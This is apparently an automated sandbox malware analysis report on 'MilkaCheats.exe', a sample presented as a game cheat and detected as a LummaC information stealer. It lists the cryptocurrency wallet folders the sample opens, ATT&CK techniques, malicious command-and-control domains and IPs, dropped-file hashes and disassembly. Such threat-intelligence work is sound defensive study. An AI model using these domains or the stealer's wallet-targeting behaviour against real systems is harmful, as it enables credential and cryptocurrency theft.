              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
              Source: C:\Users\user\Desktop\MilkaCheats.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB
              Source: Yara match File source: 00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: MilkaCheats.exe PID: 6428, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: MilkaCheats.exe PID: 6428, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 12 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 41 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 151 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 12 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 12 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 33 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Source | Detection | Scanner | Label | Link |
              | MilkaCheats.exe | 100% | Avira | HEUR/AGEN.1311191 |  |
              | MilkaCheats.exe | 100% | Joe Sandbox ML |  |  |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              | Source | Detection | Scanner | Label | Link |
              | https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |  |
              | https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |  |
              | https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | 0% | URL Reputation | safe |  |
              | https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | 0% | URL Reputation | safe |  |
              | https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |  |
              | http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe |  |
              | http://upx.sf.net | 0% | URL Reputation | safe |  |
              | https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |  |
              | https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe |  |
              | https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe |  |
              | https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |  |
              | https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |  |
              | https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |  |
              | https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe |  |
              | http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |  |
              | http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |  |
              | https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | URL Reputation | safe |  |
              | https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |  |
              | http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe |  |
              | https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | URL Reputation | safe |  |
              | https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe |  |
              | https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |  |
              | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
              | crisiwarny.store | 172.67.170.64 | true | true |  | unknown |
              | messejawu.store | unknown | unknown | true |  | unknown |
              | presticitpo.store | unknown | unknown | true |  | unknown |
              | Name | Malicious | Antivirus Detection | Reputation |
              | presticitpo.store | true |  | unknown |
              | scriptyprefej.store | true |  | unknown |
              | https://crisiwarny.store/api | true |  | unknown |
              | necklacedmny.store | true |  | unknown |
              | fadehairucw.store | true |  | unknown |
              | messejawu.store | true |  | unknown |
              | navygenerayk.store | true |  | unknown |
              | founpiuer.store | true |  | unknown |
              | thumbystriw.store | true |  | unknown |
              | crisiwarny.store | true |  | unknown |
              | IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
              | 172.67.170.64 | crisiwarny.store | United States |  | 13335 | CLOUDFLARENETUS | true |
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1543311
              Start date and time: 2024-10-27 16:44:06 +01:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 5m 45s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed: 9
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: MilkaCheats.exe
              Detection: MAL
              Classification: mal100.troj.spyw.evad.winEXE@4/6@3/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 77%
                                                                        • Number of executed functions: 8
                                                                        • Number of non-executed functions: 142
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target MilkaCheats.exe, PID 6428 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: MilkaCheats.exe
              | Time | Type | Description |
              | 11:44:57 | API Interceptor | 9x Sleep call for process: MilkaCheats.exe modified |
              | 11:45:15 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |
              | Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
              | 172.67.170.64 | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              |  | file.exe | Get hash | malicious | LummaC | Browse |  |
              | Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
              | crisiwarny.store | file.exe | Get hash | malicious | LummaC | Browse |
                • 172.67.170.64
              |  | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse |
                • 104.21.95.91
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                • 104.21.95.91
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                • 104.21.95.91
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                • 172.67.170.64
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                • 104.21.95.91
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                • 172.67.170.64
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                • 172.67.170.64
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                • 104.21.95.91
              |  | file.exe | Get hash | malicious | LummaC | Browse |
                                                                                            • 172.67.170.64
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                            • 104.21.95.91
                                                                                            17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                                                                                            • 104.21.44.95
                                                                                            17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                                                                                            • 172.67.198.131
                                                                                            care.rtfGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.43.157
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            na.docGet hashmaliciousMassLogger RATBrowse
                                                                                            • 188.114.96.3
                                                                                            na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            SecuriteInfo.com.Win32.Evo-gen.20836.29869.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            No context
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.7129085719177475
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:yWFnVToA55svtfoI7RT6tQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1FhZAX/dd:99RX55y0BU/Aju1zuiF+Z24IO8H
                                                                                            MD5:E7E58F7E7D20E2D5495FAB587B91B753
                                                                                            SHA1:2CCF52F2597E7096EB49A7C127148913273484AE
                                                                                            SHA-256:5D178FBEE9A7FB39D90B4CC881DCF8473F099A9E61521C13E3B8CF6EEC9E837E
                                                                                            SHA-512:5C02E46C831A3F29D8200AD2BAD7E58DD86605878B1768245BFF51B5AE9DA7AE34C989CCC808F7089EE39F53B7C768E3669578B7CEFEAB5AB78D9ACF4F212DA2
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.1.7.4.9.7.3.1.8.7.1.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.1.7.4.9.7.6.7.8.0.7.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.a.f.3.7.f.7.-.0.4.9.1.-.4.4.0.5.-.b.1.1.e.-.4.7.8.f.3.6.9.d.a.e.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.4.1.8.c.8.3.-.b.6.0.f.-.4.b.f.3.-.a.7.3.2.-.c.1.f.3.e.5.7.d.0.3.c.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.i.l.k.a.C.h.e.a.t.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.n.t...E.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.5.8.-.0.0.0.1.-.0.0.1.4.-.a.3.1.e.-.0.1.2.c.8.7.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.e.5.4.0.5.c.0.9.3.1.4.a.4.8.c.f.0.3.5.8.0.6.f.1.b.0.a.4.c.d.d.d.8.9.d.f.0.4.d.5.!.M.
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Oct 27 15:44:57 2024, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):36302
                                                                                            Entropy (8bit):1.7105919693502731
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:548gGxH6g+64rzeroMQi73J+ufXImAW/1mMuIL2WIcWIxEIGdWWdA2Em:lzIr8QOVl/1mMRKdWWdd
                                                                                            MD5:16BF2425BC6BD476C1E650228AE6510F
                                                                                            SHA1:6F5C8E150A053CF5461EBB266AFE4219ECA4B085
                                                                                            SHA-256:F4B494DBB483989122F909D63D31681D47A6D1CC58317FCEE77992EE48CEFB13
                                                                                            SHA-512:FF39E0AA6C94749520AF1EBCD1753DEE64DFE11192DAAD7066B8EEF90A357F0BE61A6E95987DEBDC0BB94384C4B75762A08B1D9C205962C7135B202A1ED06C40
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:MDMP..a..... ........_.g........................X...............\...........T.......8...........T......................................................................................................................eJ......x.......GenuineIntel............T.......X...._.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8420
                                                                                            Entropy (8bit):3.6995458718009133
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:R6l7wVeJeg626Y9sSU9D4gmfuxNprQ89bUnsfcQ8m:R6lXJp626YmSU9D4gmfuxdUsf/
                                                                                            MD5:D4E4FA8BF1A60116F3B550DB4BCFBBAB
                                                                                            SHA1:238F2FDF0582D43B73C6849335C274653FB9557D
                                                                                            SHA-256:654A40021AB04E5406DC97590138ADDE9F3BC8982677A47B646D437703CE1273
                                                                                            SHA-512:A90DC4B959D1F2E7D6B79348A55DA97EA84633EC805373579A062818251B7885121FE4D1503537C59DF137937AA45B1C6AD8A148AA56D3B1C79E8C5DBBAD9CF3
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.3.2.<./.P.i.
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4805
                                                                                            Entropy (8bit):4.48949414494656
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zsCJg77aI9LwWpW8VYvYm8M4Jq6o6aHFZS+q8vt6a02aQQMZUZ4d:uIjfQI7xJ7VfJq6o6dKt6HxQQMZUZ4d
                                                                                            MD5:C63B857ABA8C65E9D16970D0C9A965B5
                                                                                            SHA1:88AB2A4A1C167502A72ACC5EFAC7E20F125F9AC4
                                                                                            SHA-256:F4A38B4A5315CB49DF713ADBA3A63695F5C8B84B6F2F70CEC9E968C40CED91A7
                                                                                            SHA-512:81A7FFCC1F546690A8F74187FBC8AD3137E17A6434F9FFBD25F2315F5756EC59EFC649F74FC774152ABA9FB2C57CB8D9B2204115ACFD5EC5AF816912B4D40F73
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="562007" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                            Process:C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):400
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:rj:X
                                                                                            MD5:8BD30F5E64692F2971D94D201A7BDDBC
                                                                                            SHA1:1445B76763A443E3660BF686365374B5AA0407EA
                                                                                            SHA-256:EF938B9C248649B6EB4C1532F87EF94A8179E15D56EB8BA68EF92BCE2E68B7C1
                                                                                            SHA-512:37B0A14A1A21FD74BAD140477BE394816CD11D6778DE1007963B1EB9B81C0E246E1D779B40D3D863A6CB150AA4D5904D7492F607A8BE054B2D0281A78319CE56
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1835008
                                                                                            Entropy (8bit):4.465975195498067
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:8IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNydwBCswSbI:BXD94+WlLZMM6YFHk+I
                                                                                            MD5:961607C118A55B61C64E8BE906AAED59
                                                                                            SHA1:692808C67B54330080B6B4598CB5D15F068057DA
                                                                                            SHA-256:DECA3B8F2E2CFD10B5244534C1963EB49EBDF0687E4CF2E60FC11F5EADA5A387
                                                                                            SHA-512:BD91F77C1730C5F36A1704FF9F6CAB29C5FF5BAA2C8AA1C524CCE7DBD97B7F47D3220874DF92EA938C704BFF61AC91BCCD96C2CD48DE87BF2AFC081111A9B57F
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...,.(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.688738402361233
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:MilkaCheats.exe
                                                                                            File size:536'576 bytes
                                                                                            MD5:906c60b268404ecda308e2692a3aaaf8
                                                                                            SHA1:e5405c09314a48cf035806f1b0a4cddd89df04d5
                                                                                            SHA256:91a240e27b2849592fea2a6f326afedfc77c60d480126f5f9c57653a889b3dcf
                                                                                            SHA512:2809902c60adba46bf7c0401ddb932fa6a8a1b99960a891a4dba4211f8258d2d793d867855198373ad1341a5c41eb7da8805403ea35992431a313f6fa0fe2be2
                                                                                            SSDEEP:12288:a1dxO9DRdaPHN+q7wJu//lrZBJQ2sNiylqzSer5:a89SDj5JQ2+7mr5
                                                                                            TLSH:9BB4F11175C08033D9B3293206F0E6715B3EB9714AA65EDF67C55FBE0F302D1EA21A6A
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.ni...:...:...:...;...:...;...:...;...:...;...:...;...:...;...:...:u..:...;^..:C..;...:C..:...:C..;...:Rich...:........PE..L..
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x406e80
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x671BDFAB [Fri Oct 25 18:12:59 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:15c1a3252578de27fcd7c556fbfdb6ef
                                                                                            Instruction
                                                                                            call 00007F890CFB4FF6h
                                                                                            jmp 00007F890CFB462Fh
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                            push esi
                                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                                            add ecx, eax
                                                                                            movzx eax, word ptr [ecx+14h]
                                                                                            lea edx, dword ptr [ecx+18h]
                                                                                            add edx, eax
                                                                                            movzx eax, word ptr [ecx+06h]
                                                                                            imul esi, eax, 28h
                                                                                            add esi, edx
                                                                                            cmp edx, esi
                                                                                            je 00007F890CFB47CBh
                                                                                            mov ecx, dword ptr [ebp+0Ch]
                                                                                            cmp ecx, dword ptr [edx+0Ch]
                                                                                            jc 00007F890CFB47BCh
                                                                                            mov eax, dword ptr [edx+08h]
                                                                                            add eax, dword ptr [edx+0Ch]
                                                                                            cmp ecx, eax
                                                                                            jc 00007F890CFB47BEh
                                                                                            add edx, 28h
                                                                                            cmp edx, esi
                                                                                            jne 00007F890CFB479Ch
                                                                                            xor eax, eax
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            ret
                                                                                            mov eax, edx
                                                                                            jmp 00007F890CFB47ABh
                                                                                            push esi
                                                                                            call 00007F890CFB52F6h
                                                                                            test eax, eax
                                                                                            je 00007F890CFB47D2h
                                                                                            mov eax, dword ptr fs:[00000018h]
                                                                                            mov esi, 00482A68h
                                                                                            mov edx, dword ptr [eax+04h]
                                                                                            jmp 00007F890CFB47B6h
                                                                                            cmp edx, eax
